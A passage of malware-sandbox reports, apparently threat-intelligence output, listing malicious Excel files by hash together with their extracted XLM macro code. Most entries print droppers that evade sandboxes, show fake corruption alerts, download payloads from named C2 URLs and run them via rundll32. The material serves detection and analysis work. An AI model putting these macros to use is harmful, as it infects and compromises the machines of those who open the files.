Macro","attr":{"formulas":"WORKBOOK.HIDE(\"YzcF7KD0wu\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"030350ec38cf1e4fef87c5073ca774de6b2dbf1867dedabe87b38a1bbb1b28bb"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"030350ec38cf1e4fef87c5073ca774de6b2dbf1867dedabe87b38a1bbb1b28bb","filesize":144384,"md5":"c57af01ebc4a91da516b6b9a94665e23","sha1":"38f2e82a94965f40a01a9f16d2cc46977783e7a9","sha256":"030350ec38cf1e4fef87c5073ca774de6b2dbf1867dedabe87b38a1bbb1b28bb","sha512":"dac0194a8dd85858d2b104ce3f62b411131150ed739a86a2cf454bf98667713589ea99a8c0ac0a7f4abc0c3b95b5de7a00c4f49ce066feeacb4a44cbf30a546a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"030350ec38cf1e4fef87c5073ca774de6b2dbf1867dedabe87b38a1bbb1b28bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ZT0gMmt2ll\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03060ea4ca5fe61c691fb2d95f73642acb0899911e5ed270a15cb59bc857d62c"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"03060ea4ca5fe61c691fb2d95f73642acb0899911e5ed270a15cb59bc857d62c","filesize":116224,"md5":"ee7c9b8f29b87485af657f1943fac2ae","sha1":"f1e6061639eefab3c65e5391c710c8f064da8b58","sha256":"03060ea4ca5fe61c691fb2d95f73642acb0899911e5ed270a15cb59bc857d62c","sha512":"068fb7201b9c49ebfc76dd2591c95ef89020afc97d3bc1446ff74e73f93ca2557c90e2dfcf043a21517fd212c4777cd53d7b1da051e33f56cf0e624d0b21c4c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03060ea4ca5fe61c691fb2d95f73642acb0899911e5ed270a15cb59bc857d62c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"27c4qKWTyY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"031b35fb35b3eb6e14abf29e484d3050622bc81aa0a3c45f1ed94ebd31f9f0eb"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"031b35fb35b3eb6e14abf29e484d3050622bc81aa0a3c45f1ed94ebd31f9f0eb","filesize":170496,"md5":"a23cdd568124e0322a59bc488c704b30","sha1":"d8a40a05b6fc5ec0e88c24713bcc451e2faf6ae3","sha256":"031b35fb35b3eb6e14abf29e484d3050622bc81aa0a3c45f1ed94ebd31f9f0eb","sha512":"30d11a580d3b25d092d2964f0524c2fdacbec96e0af3a782cece045b2a92e8f5d2e2819214dc1ee078d2f8ebaac5166caec7d9bc486d1624f026b896762a1014","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"031b35fb35b3eb6e14abf29e484d3050622bc81aa0a3c45f1ed94ebd31f9f0eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HHILa0kFcm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"031cc83e2f5d30da5147670b307a37b8d81db261fdb7e61387b2a3b9889d9685"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"031cc83e2f5d30da5147670b307a37b8d81db261fdb7e61387b2a3b9889d9685","filesize":209408,"md5":"3f53c64ac08df2be0802d24126b72031","sha1":"6000cb76c2510169f2152f7b0401bd7527ef5d7c","sha256":"031cc83e2f5d30da5147670b307a37b8d81db261fdb7e61387b2a3b9889d9685","sha512":"754219a0327e79d36b2f64b35fc95689e86114d8f5262799b4b39b269503babef9f486a6571f53f30837368d78b9a9ce93cfcc5bec9a30c844220055d4aac045","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"031cc83e2f5d30da5147670b307a37b8d81db261fdb7e61387b2a3b9889d9685.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UvzeNxxoGO\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03434ec0b1fc157ab3c20d4ee90d001dfe9027db616ffe26d2db7a2e266b944b"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"03434ec0b1fc157ab3c20d4ee90d001dfe9027db616ffe26d2db7a2e266b944b","filesize":185344,"md5":"95a2f2476f6cf7ef6224fff60d555ed0","sha1":"cad3dac7b1cad2c5e5ed3b2ee2d953c1b22da331","sha256":"03434ec0b1fc157ab3c20d4ee90d001dfe9027db616ffe26d2db7a2e266b944b","sha512":"7159e0e5555d917e0793ed334d0c4cc104dc665be7cd07d6c87ff9a34e893b798de11ed6b54e4f9d7125359e03d9734cedcba2ea51b427b2bdc359a794624030","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03434ec0b1fc157ab3c20d4ee90d001dfe9027db616ffe26d2db7a2e266b944b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"037225355c3d9818358f383be6ab2564edb645cfad06237c2e96e74d18de23e3"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"037225355c3d9818358f383be6ab2564edb645cfad06237c2e96e74d18de23e3","filesize":209920,"md5":"69ce9bfe4539ad77075734a7af1fafb9","sha1":"97ce2414cbff7539dd116c7c5200e054e1e9340a","sha256":"037225355c3d9818358f383be6ab2564edb645cfad06237c2e96e74d18de23e3","sha512":"eaa1e22b0250c4a613ed0e34a5b766657ea2dbf15405e70888edb29158bdf3dbc111e54dc314c6468d745f4724362e209fed662a17d21cfd9bff6431e4dfefe2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"037225355c3d9818358f383be6ab2564edb645cfad06237c2e96e74d18de23e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7BcD5lePxJ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03786f39e4ab5538f378d63bf83141e99f5a3cf72a659a0a2156897e8dcadc2d"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"03786f39e4ab5538f378d63bf83141e99f5a3cf72a659a0a2156897e8dcadc2d","filesize":185344,"md5":"a6e748309df41f99ee549a775fc8e3ca","sha1":"df24cb0be0620bf4d372ff3b17da4c2a982c1ed5","sha256":"03786f39e4ab5538f378d63bf83141e99f5a3cf72a659a0a2156897e8dcadc2d","sha512":"0da4117fea7486fc52f8f4cbb1ee260062bda12c5acec0f8d77d4f630950aca97941415b04b1632d97d7b9b605cf560feda3f3e92c2c59df985875175e014301","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03786f39e4ab5538f378d63bf83141e99f5a3cf72a659a0a2156897e8dcadc2d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0378b8256e292fb83f5f59f0a846cdf8b3c480ca8d9d9e9cc925bfaa13f8d0c2"},"analysis":{"reported":"2020-04-09T16:14:40Z","score":10},"files":[{"filename":"0378b8256e292fb83f5f59f0a846cdf8b3c480ca8d9d9e9cc925bfaa13f8d0c2","filesize":185344,"md5":"a4944e8c245ac443ea2f4bb6d4d7e69f","sha1":"c460c087c1031adb64a7f37e7c1a6e102c43a1a4","sha256":"0378b8256e292fb83f5f59f0a846cdf8b3c480ca8d9d9e9cc925bfaa13f8d0c2","sha512":"15848a7773da56da13b8ddbeab558428d3ae428bfeb7d99f888f7406033b54e203b40bc875ab14572963eb42670d590507456c18aaa02ebc0c7b567d6d629e2f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0378b8256e292fb83f5f59f0a846cdf8b3c480ca8d9d9e9cc925bfaa13f8d0c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03968d0ff69d0ecd0775b42f3439233ba1d6414dd870dd41b812433062f471b0"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"03968d0ff69d0ecd0775b42f3439233ba1d6414dd870dd41b812433062f471b0","filesize":209920,"md5":"04bf46fcff46eabe3130e1d6d10a67e0","sha1":"53232a298b7be529910d47e6f05cc124fdfab39f","sha256":"03968d0ff69d0ecd0775b42f3439233ba1d6414dd870dd41b812433062f471b0","sha512":"bb1b41794dc0225850aba98f30df22906be79a0f2cecc05e974cba3d466eeeb75f6d10c39efb9ac851e53e3085dae1ec3f168603bc1979b93b31d88b1f444608","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03968d0ff69d0ecd0775b42f3439233ba1d6414dd870dd41b812433062f471b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kY2AUSFA1i\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"039e1ad759ae2e7e452f3d8aa4427d92a0b046dc8f03c897cbf4a250665c90c3"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"039e1ad759ae2e7e452f3d8aa4427d92a0b046dc8f03c897cbf4a250665c90c3","filesize":144384,"md5":"0bf83b2fe964e34ba68bf64ad448b01f","sha1":"522eab83071ce79f0098618e78be0cf9adbfbf6a","sha256":"039e1ad759ae2e7e452f3d8aa4427d92a0b046dc8f03c897cbf4a250665c90c3","sha512":"22e22459b94944492376788b1a142fad0d233a5a6098836445829a6bf244c3eb90daa17cae6e13e8de09ab4abd7cddeedb65925ca6aa3a4b02be9aaa025decce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"039e1ad759ae2e7e452f3d8aa4427d92a0b046dc8f03c897cbf4a250665c90c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"dn8RGOGDW6\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03c4ef301ba77f2bddb39fa83488349300416943e57ac348c21cfa29e8f17157"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"03c4ef301ba77f2bddb39fa83488349300416943e57ac348c21cfa29e8f17157","filesize":206336,"md5":"60cd20034189cfaae7a768b805c10ee1","sha1":"2f6e62d77a1c3bdcdd642695ed8759000239498a","sha256":"03c4ef301ba77f2bddb39fa83488349300416943e57ac348c21cfa29e8f17157","sha512":"8d41383e4e079fa3d95deaa58387ce9c89835ba1095e9249e135b838a029d6c8d200307a03c42e59288fbc6921bcb38aab3074632c1666e152ce050d4a8ccdaf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03c4ef301ba77f2bddb39fa83488349300416943e57ac348c21cfa29e8f17157.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nVFe9FpYGy\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03cc298aee588966fc1835ec002bc918b79cb9a34ee0cf64d06017c1a2ae9d17"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"03cc298aee588966fc1835ec002bc918b79cb9a34ee0cf64d06017c1a2ae9d17","filesize":206336,"md5":"6ccf6716b1e5f8d4f9ee702f25d265c5","sha1":"e2438f4da6e93bf09b9d2533f2ac515394a156e6","sha256":"03cc298aee588966fc1835ec002bc918b79cb9a34ee0cf64d06017c1a2ae9d17","sha512":"826918353454d348a5fd5d3ea702891fc0622c31e2daaff63f7cfe492813e48f0dbdd5f7b9b55ec44c462c5079c526e6943316965fb017e7c8a6340e7a3b9a63","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03cc298aee588966fc1835ec002bc918b79cb9a34ee0cf64d06017c1a2ae9d17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"094IYXAN29\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03d0efe3bac3bc2ebb32b26eafaac36e475912c93ad51d1bf7bcb3dccecce9e1"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"03d0efe3bac3bc2ebb32b26eafaac36e475912c93ad51d1bf7bcb3dccecce9e1","filesize":185344,"md5":"478e7863305b4a2b9bd9cc087a2b1fd9","sha1":"094ccf986ddb9b689eb4394a8fcd8eff48950cca","sha256":"03d0efe3bac3bc2ebb32b26eafaac36e475912c93ad51d1bf7bcb3dccecce9e1","sha512":"d397d87241b7b9f5ab189fd8835903944535c118019891b746a1d1686bba957b0836cd467f1f60b55e96ab6036cbda4026f7f03dc448f7d0f671664ec4545f56","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03d0efe3bac3bc2ebb32b26eafaac36e475912c93ad51d1bf7bcb3dccecce9e1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"03edca94319cafe610ea54aa3ac3cf377b6aaf0d521d8713b6ab876b6900bf10"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"03edca94319cafe610ea54aa3ac3cf377b6aaf0d521d8713b6ab876b6900bf10","filesize":185344,"md5":"8cb92c21428aa3c99db866b916553df7","sha1":"cb55ad0b3ecadeac6da749cc56e4c5c1d8ab4199","sha256":"03edca94319cafe610ea54aa3ac3cf377b6aaf0d521d8713b6ab876b6900bf10","sha512":"6d4707de45b1f510e9da3eef7fcf78818a614bea71051e359fcf60786a6889f666e2ca654ddfe6aded8df45d34d09382883ae2393244a04cadf576634e80cbe2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"03edca94319cafe610ea54aa3ac3cf377b6aaf0d521d8713b6ab876b6900bf10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"040f92137b13bd1657bade339e1e75e8fe1aa0517fdd3c9fbd96f953fd5d900d"},"analysis":{"reported":"2020-04-09T16:14:41Z","score":10},"files":[{"filename":"040f92137b13bd1657bade339e1e75e8fe1aa0517fdd3c9fbd96f953fd5d900d","filesize":209920,"md5":"a931b014890ca245d5c3fa121cb21c3f","sha1":"ae9fd2c9dde810992b831082cb449dc233b0960b","sha256":"040f92137b13bd1657bade339e1e75e8fe1aa0517fdd3c9fbd96f953fd5d900d","sha512":"478a8ae452ba3e7af16f86d042ad53a6d49dc9871e331fef4a8c259d9ae1f2113cb05bc6d9d0eb2dec8020e8a3baf5ad15c420735acd9e01a7fe21d6c0dc5ed0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"040f92137b13bd1657bade339e1e75e8fe1aa0517fdd3c9fbd96f953fd5d900d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dgIaaEBE8J\",TRUE)\nGOTO(R$0C$16)"}}}]}
